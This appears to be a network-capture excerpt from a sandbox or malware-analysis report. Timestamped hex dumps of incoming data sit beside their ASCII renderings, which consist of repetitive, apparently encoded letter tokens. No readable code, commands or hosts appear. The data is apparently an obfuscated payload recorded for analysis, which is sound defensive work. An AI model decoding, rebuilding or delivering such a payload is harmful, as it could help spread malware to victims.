                                                            2021-10-29 18:10:39 UTC137INData Raw: 71 20 57 58 20 57 57 20 44 4d 20 70 44 20 4a 6d 57 20 70 45 20 71 4a 70 20 57 71 20 70 70 20 57 71 20 57 6d 20 58 20 71 71 4f 20 4a 71 71 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 4a 58 20 6d 71 20 71 6d 6d 20 58 6d 20 71 71 57 20 71 71 45 20 71 58 4a 20 71 4f 45 20 71 6d 58 20 6d 58 20 57 71 20 57 6d 20 58 4a 20 71 71 4f 20 71 71 57 20 71 4a 6d 20 71 71 70 20 57 4f 20 4a 70 57 20 6d 44 20 71 6d 6d 20 58 6d 20 71 71 57 20 71 71 45 20 4a 4a 71 20 71 4f 45 20 71 6d 58 20 6d 58 20 57 71 20 57 6d 20 71 6d 70 20 71 4f 57 20 4a 71 71 20 71 4f 4d 20 71 71 70 20 57 4f 20 57 6d 20 6d 44 20 44 70 20 44 4d 20 71 71 44 20 71 71 45 20 71 45 58 20 58 45 20 70 70 20 70 70 20 57 4a 20 57 6d 20 71 71 57 20 58 71 20 71 4f 4a 20 71 4a 6d 20 71 71 58 20 57 4f 20 4a 6d 45 20 71
                                                            Data Ascii: q WX WW DM pD JmW pE qJp Wq pp Wq Wm X qqO Jqq qOM qqp WO qJX mq qmm Xm qqW qqE qXJ qOE qmX mX Wq Wm XJ qqO qqW qJm qqp WO JpW mD qmm Xm qqW qqE JJq qOE qmX mX Wq Wm qmp qOW Jqq qOM qqp WO Wm mD Dp DM qqD qqE qEX XE pp pp WJ Wm qqW Xq qOJ qJm qqX WO JmE q
                                                            2021-10-29 18:10:39 UTC141INData Raw: 71 20 70 70 20 71 20 57 57 20 4a 58 20 71 4a 4a 20 71 4d 44 20 71 4a 6d 20 44 45 20 57 71 20 71 45 58 20 70 45 20 70 45 20 44 4d 20 44 57 20 71 71 44 20 44 4d 20 71 71 58 20 71 70 71 20 70 70 20 71 20 57 57 20 6d 6d 20 71 4f 44 20 71 57 4f 20 71 4a 6d 20 44 45 20 57 71 20 57 70 20 44 71 20 71 45 58 20 44 4d 20 44 57 20 71 71 44 20 71 4d 4d 20 4d 44 20 71 45 57 20 70 70 20 71 20 57 57 20 71 44 71 20 4d 45 20 71 4f 71 20 71 4a 45 20 44 45 20 57 71 20 4d 58 20 44 70 20 70 57 20 45 4f 20 44 57 20 71 71 44 20 4a 4a 57 20 71 4f 4a 20 4a 70 57 20 70 70 20 71 20 57 57 20 57 20 4d 45 20 71 45 4a 20 71 4a 6d 20 44 45 20 57 71 20 4a 4a 58 20 70 45 20 70 45 20 44 4d 20 44 57 20 71 71 44 20 4a 57 4a 20 71 71 4d 20 71 6d 4d 20 70 70 20 71 20 57 57 20 4a 4a 4f 20 71 4a
                                                            Data Ascii: q pp q WW JX qJJ qMD qJm DE Wq qEX pE pE DM DW qqD DM qqX qpq pp q WW mm qOD qWO qJm DE Wq Wp Dq qEX DM DW qqD qMM MD qEW pp q WW qDq ME qOq qJE DE Wq MX Dp pW EO DW qqD JJW qOJ JpW pp q WW W ME qEJ qJm DE Wq JJX pE pE DM DW qqD JWJ qqM qmM pp q WW JJO qJ
                                                            2021-10-29 18:10:39 UTC146INData Raw: 71 70 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 71 4a 20 58 4f 20 6d 71 20 71 58 57 20 70 6d 20 6d 4d 20 71 71 6d 20 45 70 20 6d 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 58 6d 20 70 20 71 4f 58 20 70 4f 20 71 4f 4f 20 58 6d 20 6d 58 20 44 44 20 71 71 45 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 4f 20 71 58 70 20 57 20 71 58 4a 20 44 6d 20 4a 71 20 71 71 45 20 4a 4f 71 20 57 71 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 4f 20 71 71 6d 20 4a 6d 57 20 71 71 44 20 70 20 70 58 20 58 58 20 57 4f 20 4a 70 58 20 4a 70 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 58 4f 20 6d 58 20 4a 4a 44 20 4f 20 70 4d 20 71 4f 4a 20 4a 58 20 71 4f 4d 20 71 4a 6d 20 71 71 58 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20
                                                            Data Ascii: qp Wm Xm qqm qqE JpW qqJ XO mq qXW pm mM qqm Ep mD qqJ WO mX WO qED Xm p qOX pO qOO Xm mX DD qqE Xm qqm qqE qOM JmD WO qXp W qXJ Dm Jq qqE JOq Wq WO mX WO Wm JqO qqm JmW qqD p pX XX WO JpX Jp qqm qqE qOM qqJ qXO mX JJD O pM qOJ JX qOM qJm qqX mX WO Wm Xm
                                                            2021-10-29 18:10:39 UTC150INData Raw: 20 71 44 4d 20 45 45 20 71 44 6d 20 70 45 20 71 58 20 57 57 20 71 57 45 20 4a 71 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 4a 20 6d 4a 20 71 4d 4f 20 4d 44 20 71 71 57 20 71 71 45 20 45 44 20 71 71 70 20 4a 70 4f 20 58 45 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 45 4d 20 71 4f 4d 20 6d 57 20 4f 20 71 45 45 20 70 4d 20 4a 70 20 58 57 20 6d 4a 20 4a 4d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 4a 6d 6d 20 57 6d 20 4a 70 4f 20 45 6d 20 4a 57 6d 20 71 4a 4f 20 58 70 20 57 71 20 4d 4a 20 58 4d 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 4a 57 4a 20 58 20 71 45 70 20 70 57 20 71 71 4d 20 71 71 57 20 71 20 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 4d 4a 20 71 45 4a 20 45 45 20 4a 4f 4a 20 71 4f 71 20 71
                                                            Data Ascii: qDM EE qDm pE qX WW qWE Jq qqE qOM qqJ WO qXJ mJ qMO MD qqW qqE ED qqp JpO XE WO Wm Xm qqm qEM qOM mW O qEE pM Jp XW mJ JM qOM qqJ WO mX Jmm Wm JpO Em JWm qJO Xp Wq MJ XM Wm Xm qqm qqE JpW qJO JWJ X qEp pW qqM qqW q D qqJ WO mX WO qED MJ qEJ EE JOJ qOq q
                                                            2021-10-29 18:10:39 UTC154INData Raw: 20 4a 71 20 71 71 44 20 71 58 71 20 4a 4f 58 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 4f 20 71 4f 44 20 4a 57 70 20 58 4d 20 71 71 70 20 57 4f 20 58 58 20 57 71 20 4a 71 6d 20 4a 6d 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 58 4f 20 57 44 20 4a 70 57 20 57 58 20 71 57 45 20 71 71 6d 20 4a 4d 20 71 4f 58 20 71 57 4a 20 71 6d 44 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 4a 6d 6d 20 71 4a 57 20 71 6d 4f 20 71 4a 6d 20 70 6d 20 6d 58 20 4d 4f 20 57 57 20 71 44 57 20 4a 71 4f 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 4a 20 57 58 20 71 71 70 20 58 4f 20 71 58 45 20 71 71 45 20 6d 20 71 71 70 20 4a 4f 70 20 71 6d 6d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 44 70 20 57 6d 20 70 4a 20 57 4f 20 4d 57 20 58 57 20
                                                            Data Ascii: Jq qqD qXq JOX WO mX WO Wm JqO qOD JWp XM qqp WO XX Wq Jqm Jmm qqm qqE qOM qqJ qXO WD JpW WX qWE qqm JM qOX qWJ qmD mX WO Wm Xm Jmm qJW qmO qJm pm mX MO WW qDW JqO qqE qOM qqJ WO qXJ WX qqp XO qXE qqE m qqp JOp qmm WO Wm Xm qqm Jmp qOq Dp Wm pJ WO MW XW
                                                            2021-10-29 18:10:39 UTC158INData Raw: 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 4a 4f 57 20 57 58 20 57 70 20 57 4f 20 71 45 57 20 58 57 20 45 44 20 4a 71 6d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 4f 20 44 4a 20 71 4f 6d 20 71 4a 71 20 71 58 58 20 71 4f 4d 20 4a 70 6d 20 57 71 20 71 71 58 20 71 6d 57 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 71 71 58 20 57 4d 20 70 6d 20 57 6d 20 4a 4f 44 20 71 71 57 20 57 58 20 4a 4f 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 45 44 20 4a 57 4f 20 44 57 20 71 4f 58 20 71 71 4a 20 71 44 4d 20 6d 4d 20 71 4f 71 20 71 6d 4d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 58 20 71 71 4d 20 57 6d 20 4a 57 57 20 58 6d 20 4a 70 70 20 71 71 44 20 57 4f 20 4a 71 71 20 57 4f 20
                                                            Data Ascii: WO Wm Xm qqm Jmp qOq JOW WX Wp WO qEW XW ED Jqm qOM qqJ WO mX qXO DJ qOm qJq qXX qOM Jpm Wq qqX qmW Wm Xm qqm qqE JpW qJO qqX WM pm Wm JOD qqW WX JOD qqJ WO mX WO qED ED JWO DW qOX qqJ qDM mM qOq qmM Xm qqm qqE qOM JmD WX qqM Wm JWW Xm Jpp qqD WO Jqq WO
                                                            2021-10-29 18:10:39 UTC161INData Raw: 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 71 4f 44 20 6d 4d 20 45 58 20 70 45 20 71 6d 71 20 58 57 20 4a 4f 57 20 4a 71 71 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 4f 20 44 4a 20 71 71 4d 20 71 71 70 20 4a 57 70 20 71 4a 4a 20 4a 4f 70 20 57 71 20 4a 6d 58 20 71 6d 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 4a 57 4f 20 57 4a 20 71 4f 4a 20 70 70 20 4a 70 4a 20 71 71 57 20 71 44 57 20 4a 4f 70 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 4d 4a 20 71 44 70 20 71 71 70 20 57 71 20 71 4f 70 20 71 6d 4a 20 6d 4d 20 4a 70 57 20 71 6d 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 58 20 4a 58 20 57 70 20 45 4a 20 44 45 20 4a 4f 45 20 71 71 44 20 71 6d 4f 20 4a 71 6d 20 57 4f 20 6d 58 20 57 4f
                                                            Data Ascii: Xm qqm Jmp qOq qOD mM EX pE qmq XW JOW Jqq qOM qqJ WO mX qXO DJ qqM qqp JWp qJJ JOp Wq JmX qmX Wm Xm qqm qqE JpW qJO JWO WJ qOJ pp JpJ qqW qDW JOp qqJ WO mX WO qED MJ qDp qqp Wq qOp qmJ mM JpW qmm Xm qqm qqE qOM JmD WX JX Wp EJ DE JOE qqD qmO Jqm WO mX WO
                                                            2021-10-29 18:10:39 UTC165INData Raw: 20 71 45 44 20 45 44 20 4a 57 4f 20 44 57 20 71 4f 58 20 71 71 4a 20 4a 4f 58 20 6d 4d 20 4a 45 20 71 57 44 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 70 20 57 4f 20 71 70 4f 20 6d 4d 20 4d 58 20 44 45 20 71 6d 6d 20 71 71 44 20 4d 71 20 4a 71 58 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 57 20 71 71 6d 20 4a 70 4d 20 71 4f 71 20 71 58 4d 20 70 45 20 4a 71 4f 20 57 71 20 71 71 45 20 4a 57 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 45 45 20 6d 58 20 71 6d 4a 20 57 58 20 71 70 71 20 71 4f 71 20 71 57 71 20 71 4f 58 20 70 4a 20 71 57 4a 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 4a 6d 71 20 71 71 45 20 44 45 20 71 4a 45 20 4a 71 71 20 70 4d 20 4a 4f 58 20 57 57 20 4d 20 4a 71 44 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 44 71
                                                            Data Ascii: qED ED JWO DW qOX qqJ JOX mM JE qWD Xm qqm qqE qOM Jmp WO qpO mM MX DE qmm qqD Mq JqX WO mX WO Wm JqW qqm JpM qOq qXM pE JqO Wq qqE JWm qqm qqE qOM qqJ qEE mX qmJ WX qpq qOq qWq qOX pJ qWJ mX WO Wm Xm Jmq qqE DE qJE Jqq pM JOX WW M JqD qqE qOM qqJ WO qDq
                                                            2021-10-29 18:10:39 UTC169INData Raw: 20 4a 4f 6d 20 6d 4d 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 44 58 20 71 71 70 20 57 4a 20 58 6d 20 71 71 57 20 71 71 45 20 4a 44 20 4d 4a 20 57 4f 20 71 44 20 6d 58 20 57 6d 20 58 4a 20 71 4f 57 20 71 71 45 20 45 45 20 71 71 57 20 57 4f 20 71 4d 44 20 70 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 4a 57 6d 20 45 4a 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 71 4f 20 4d 6d 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 45 71 20 71 4f 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 4d 4a 20 57 4f 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 4a 6d 4a 20 57 4f 20 71 71 45 20 71 4f 4d 20 71 71 57 20 57 4f 20 71 45 6d 20 71 71 6d 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 70 4d 20 44 6d 20 57 4f 20 6d 58 20 57 57 20 57 6d 20 71 4a 45 20 71 4f 6d 20
                                                            Data Ascii: JOm mM qqE qOM qqp WO qDX qqp WJ Xm qqW qqE JD MJ WO qD mX Wm XJ qOW qqE EE qqW WO qMD pq Wm Xm qqX qqE JWm EJ WO mX Wq Wm JqO Mm qqE qOM qqm WO qEq qO Wm Xm qqW qqE MJ WO WO mX mX Wm JmJ WO qqE qOM qqW WO qEm qqm Wm Xm qqX qqE pM Dm WO mX WW Wm qJE qOm
                                                            2021-10-29 18:10:39 UTC173INData Raw: 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71
                                                            Data Ascii: OM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO q
                                                            2021-10-29 18:10:39 UTC176INData Raw: 4f 20 70 45 20 71 4d 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 44 44 20 58 71 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 70 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 4a 71 20 71 44 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 44 4a 20 6d 4d 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 4f 57 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 4a 45 20 4a 71 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 44 4f 20 57 71 20 70 6d 20 70 4a 20 6d 58 20 57 6d 20 4a 70 6d 20 58 4d 20 71 4f 71 20 71 4a 57 20 71 71 57 20 57 4f 20 4a 6d 45 20 4a 57 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 45 58 20 45 71 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 6d 4d 20 4d 71 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 57 45 20 4a 45 20 57 6d 20 58 6d
                                                            Data Ascii: O pE qM Wm Xm qqJ qqE DD Xq WO mX Wq Wm p qqX qqE qOM qqp WO Jq qD Wm Xm qqJ qqE DJ mM WO mX Wq Wm JOW mX qqE qOM qqm WO qJE Jq Wm Xm qqW qqE DO Wq pm pJ mX Wm Jpm XM qOq qJW qqW WO JmE JW Wm Xm qqX qqE EX Eq WO mX Wq Wm JmM Mq qqE qOM qqp WO qWE JE Wm Xm
                                                            2021-10-29 18:10:39 UTC180INData Raw: 6d 20 4a 71 4f 20 4d 6d 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 71 70 20 71 71 4a 20 57 6d 20 71 71 44 20 71 71 70 20 71 71 45 20 71 4d 57 20 58 4a 20 6d 58 20 6d 58 20 57 6d 20 57 6d 20 71 4f 4f 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 45 20 57 4f 20 45 20 71 57 20 57 6d 20 58 6d 20 71 71 44 20 71 71 45 20 45 4f 20 45 45 20 57 4f 20 6d 58 20 57 70 20 57 6d 20 4a 6d 4a 20 57 4f 20 71 71 45 20 71 4f 4d 20 71 4a 4f 20 57 4f 20 71 45 6d 20 71 71 6d 20 57 6d 20 58 6d 20 71 4a 70 20 71 71 45 20 4a 57 6d 20 45 4a 20 57 4f 20 6d 58 20 57 44 20 57 6d 20 71 57 57 20 58 58 20 71 71 45 20 71 4f 4d 20 71 4a 70 20 57 4f 20 71 71 57 20 71 57 20 57 4a 20 58 6d 20 71 71 57 20 71 71 45 20 4d 70 20 57 4f 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 45 57 20 45 44 20
                                                            Data Ascii: m JqO Mm qqE qOM qqm WO qqp qqJ Wm qqD qqp qqE qMW XJ mX mX Wm Wm qOO mX qqE qOM qqE WO E qW Wm Xm qqD qqE EO EE WO mX Wp Wm JmJ WO qqE qOM qJO WO qEm qqm Wm Xm qJp qqE JWm EJ WO mX WD Wm qWW XX qqE qOM qJp WO qqW qW WJ Xm qqW qqE Mp WO WO mX mX Wm EW ED
                                                            2021-10-29 18:10:39 UTC184INData Raw: 71 58 58 20 57 6d 20 4a 4f 45 20 58 6d 20 71 45 4f 20 71 4f 6d 20 4a 57 4a 20 71 71 44 20 4d 4d 20 6d 58 20 57 44 20 70 71 20 71 57 45 20 71 71 6d 20 71 4d 44 20 71 71 4f 20 4a 6d 58 20 44 20 70 4a 20 57 4f 20 71 6d 70 20 58 45 20 44 4f 20 6d 4d 20 4a 4f 45 20 71 71 44 20 4a 57 71 20 57 71 20 71 58 44 20 4a 20 4a 57 70 20 71 71 58 20 71 44 71 20 71 4f 4d 20 4a 6d 58 20 44 20 4a 6d 4f 20 57 6d 20 4a 70 4d 20 58 45 20 44 71 20 45 44 20 71 44 45 20 71 71 44 20 4a 71 71 20 57 71 20 71 4d 4a 20 4a 71 20 71 70 4a 20 71 71 58 20 71 57 44 20 71 71 4f 20 6d 71 20 70 71 20 4a 70 4f 20 57 6d 20 71 4d 4d 20 58 45 20 6d 20 71 4f 44 20 71 45 45 20 71 71 44 20 4a 70 4f 20 6d 58 20 71 44 70 20 4a 4d 20 71 71 57 20 71 71 6d 20 71 71 44 20 71 4f 58 20 4a 6d 58 20 44 20 4a
                                                            Data Ascii: qXX Wm JOE Xm qEO qOm JWJ qqD MM mX WD pq qWE qqm qMD qqO JmX D pJ WO qmp XE DO mM JOE qqD JWq Wq qXD J JWp qqX qDq qOM JmX D JmO Wm JpM XE Dq ED qDE qqD Jqq Wq qMJ Jq qpJ qqX qWD qqO mq pq JpO Wm qMM XE m qOD qEE qqD JpO mX qDp JM qqW qqm qqD qOX JmX D J
                                                            2021-10-29 18:10:39 UTC188INData Raw: 57 70 20 6d 57 20 71 4f 20 71 4f 70 20 71 4a 45 20 4d 4a 20 71 71 71 20 71 44 4d 20 71 71 4a 20 4d 20 44 70 20 70 71 20 58 44 20 71 45 4f 20 4d 57 20 58 4a 20 71 4a 57 20 71 71 57 20 57 70 20 71 4f 6d 20 71 58 20 6d 20 71 4a 45 20 57 4a 20 71 4f 6d 20 57 6d 20 71 71 6d 20 57 70 20 57 4f 20 71 71 4d 20 58 71 20 4a 71 70 20 58 44 20 57 58 20 71 4a 57 20 71 4a 70 20 57 70 20 70 4f 20 4a 44 20 4d 20 71 4a 45 20 71 4d 44 20 71 4f 58 20 4a 6d 58 20 44 20 58 70 20 44 70 20 71 4f 70 20 58 45 20 4a 6d 6d 20 45 4f 20 45 20 71 4a 57 20 4d 4d 20 57 70 20 71 58 44 20 4a 20 58 57 20 71 71 6d 20 70 44 20 71 4f 6d 20 4a 6d 45 20 4a 71 20 44 58 20 44 70 20 71 4f 70 20 58 71 20 71 45 44 20 58 4a 20 4a 57 20 71 4a 57 20 71 4f 45 20 57 70 20 70 4d 20 71 6d 20 6d 57 20 71 4a
                                                            Data Ascii: Wp mW qO qOp qJE MJ qqq qDM qqJ M Dp pq XD qEO MW XJ qJW qqW Wp qOm qX m qJE WJ qOm Wm qqm Wp WO qqM Xq Jqp XD WX qJW qJp Wp pO JD M qJE qMD qOX JmX D Xp Dp qOp XE Jmm EO E qJW MM Wp qXD J XW qqm pD qOm JmE Jq DX Dp qOp Xq qED XJ JW qJW qOE Wp pM qm mW qJ
                                                            2021-10-29 18:10:39 UTC192INData Raw: 4f 20 71 4d 58 20 44 71 20 4a 4a 70 20 58 4a 20 71 4d 70 20 71 71 45 20 71 4d 20 71 4f 44 20 57 71 20 57 57 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 4a 6d 20 71 4f 44 20 71 4d 57 20 57 4f 20 71 4d 4f 20 6d 4f 20 4a 70 20 58 70 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 45 20 57 57 20 71 4a 4d 20 57 6d 20 4a 4f 4a 20 71 4f 6d 20 57 4a 20 71 4f 44 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 71 71 45 20 58 70 20 4a 4f 4d 20 71 71 45 20 71 57 70 20 71 4f 4d 20 71 4a 70 20 57 57 20 71 4a 4d 20 57 6d 20 4a 57 4f 20 71 4f 6d 20 4a 4f 20 71 4f 44 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 58 57 20 58 70 20 4a 4f 4d 20 71 71 45 20 71 71 70 20 71 71 4f 20 4d 71 20 57 57 20 71 4a 4d 20 57 6d 20 4a 70 6d 20 71 4f 6d 20 4a 6d 6d 20 71 4f 44 20 57 71 20
                                                            Data Ascii: O qMX Dq JJp XJ qMp qqE qM qOD Wq WW qqp Wm qDJ qJW qJm qOD qMW WO qMO mO Jp Xp mM qqE qWW qJE JE WW qJM Wm JOJ qOm WJ qOD Wq WO qMX Dq qqE Xp JOM qqE qWp qOM qJp WW qJM Wm JWO qOm JO qOD Wq WO qMX Dq XW Xp JOM qqE qqp qqO Mq WW qJM Wm Jpm qOm Jmm qOD Wq
                                                            2021-10-29 18:10:39 UTC196INData Raw: 44 20 71 71 58 20 71 45 45 20 71 71 45 20 57 4d 20 71 4f 45 20 71 45 58 20 71 58 20 4a 6d 71 20 57 6d 20 57 71 20 71 4f 57 20 4a 71 70 20 45 4d 20 71 45 4d 20 57 4f 20 45 4a 20 6d 71 20 71 6d 44 20 71 71 58 20 70 70 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 6d 4a 20 71 58 20 4a 6d 71 20 57 6d 20 4a 4a 71 20 71 4f 57 20 71 6d 4d 20 45 4d 20 71 45 4d 20 57 4f 20 71 45 4f 20 6d 71 20 57 6d 20 71 71 4d 20 71 45 45 20 71 71 45 20 71 4d 58 20 71 4f 45 20 71 58 20 71 4d 20 4a 6d 71 20 57 6d 20 4a 70 4a 20 71 4f 57 20 58 71 20 45 58 20 70 57 20 57 4f 20 71 4d 58 20 44 71 20 71 71 58 20 71 71 4d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 58 4a 20 71 4d 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 6d 57 20 45 58 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20
                                                            Data Ascii: D qqX qEE qqE WM qOE qEX qX Jmq Wm Wq qOW Jqp EM qEM WO EJ mq qmD qqX pp qqE qWW qJE JmJ qX Jmq Wm JJq qOW qmM EM qEM WO qEO mq Wm qqM qEE qqE qMX qOE qX qM Jmq Wm JpJ qOW Xq EX pW WO qMX Dq qqX qqM mM qqE qWW qJE XJ qM qqp Wm qDJ qJW JmW EX Wq WO qMX Dq
                                                            2021-10-29 18:10:39 UTC201INData Raw: 20 71 4f 4d 20 71 71 70 20 57 4f 20 44 4a 20 57 4f 20 57 6d 20 58 6d 20 71 4d 20 71 71 45 20 71 4f 58 20 71 71 4a 20 70 6d 20 6d 58 20 57 4f 20 57 6d 20 57 6d 20 71 71 6d 20 71 71 44 20 71 4f 4d 20 4d 58 20 57 4f 20 6d 58 20 57 4f 20 58 57 20 58 6d 20 71 71 57 20 71 71 45 20 71 4a 71 20 71 71 4a 20 57 4f 20 6d 58 20 58 44 20 57 6d 20 58 57 20 71 71 6d 20 4d 4d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 58 57 20 57 4f 20 57 57 20 58 6d 20 71 4f 44 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 58 6d 20 6d 58 20 57 71 20 57 6d 20 45 4a 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 70 20 57 4f 20 6d 4d 20 57 4f 20 6d 4f 20 58 6d 20 71 71 6d 20 71 71 45 20 57 20 71 71 4a 20 57 71 20 6d 58 20 71 58 20 57 6d 20 58 6d 20 71 71 6d 20 4a 58 20 71 4f 4d 20 71 71 70 20 57 4f 20 4a 4a
                                                            Data Ascii: qOM qqp WO DJ WO Wm Xm qM qqE qOX qqJ pm mX WO Wm Wm qqm qqD qOM MX WO mX WO XW Xm qqW qqE qJq qqJ WO mX XD Wm XW qqm MM qOM qqJ WO XW WO WW Xm qOD qqE qOM qqJ Xm mX Wq Wm EJ qqm qqE qOM Jp WO mM WO mO Xm qqm qqE W qqJ Wq mX qX Wm Xm qqm JX qOM qqp WO JJ
                                                            2021-10-29 18:10:39 UTC205INData Raw: 20 71 71 71 20 71 71 45 20 71 71 71 20 71 71 4a 20 4a 4f 57 20 6d 58 20 6d 57 20 57 6d 20 58 57 20 71 71 6d 20 71 71 45 20 71 4f 58 20 71 71 71 20 57 4f 20 57 4f 20 57 4f 20 6d 6d 20 58 57 20 58 70 20 71 71 45 20 71 4f 58 20 71 71 4a 20 6d 71 20 6d 4d 20 71 4d 20 57 6d 20 58 44 20 71 71 6d 20 71 4f 57 20 71 4f 58 20 58 70 20 57 4f 20 6d 4d 20 57 4f 20 6d 70 20 58 57 20 58 71 20 71 71 45 20 71 71 71 20 71 71 4a 20 6d 57 20 6d 4d 20 4a 70 20 57 6d 20 58 57 20 71 71 6d 20 58 57 20 71 4f 58 20 58 57 20 57 4f 20 57 4f 20 57 4f 20 4a 70 20 58 57 20 58 57 20 71 71 45 20 71 4f 58 20 71 71 4a 20 71 44 20 6d 4d 20 4a 71 20 57 6d 20 58 44 20 71 71 6d 20 58 44 20 71 4f 58 20 58 4d 20 57 4f 20 6d 4d 20 57 4f 20 71 58 20 58 57 20 4d 71 20 71 71 45 20 71 71 71 20 71 71
                                                            Data Ascii: qqq qqE qqq qqJ JOW mX mW Wm XW qqm qqE qOX qqq WO WO WO mm XW Xp qqE qOX qqJ mq mM qM Wm XD qqm qOW qOX Xp WO mM WO mp XW Xq qqE qqq qqJ mW mM Jp Wm XW qqm XW qOX XW WO WO WO Jp XW XW qqE qOX qqJ qD mM Jq Wm XD qqm XD qOX XM WO mM WO qX XW Mq qqE qqq qq
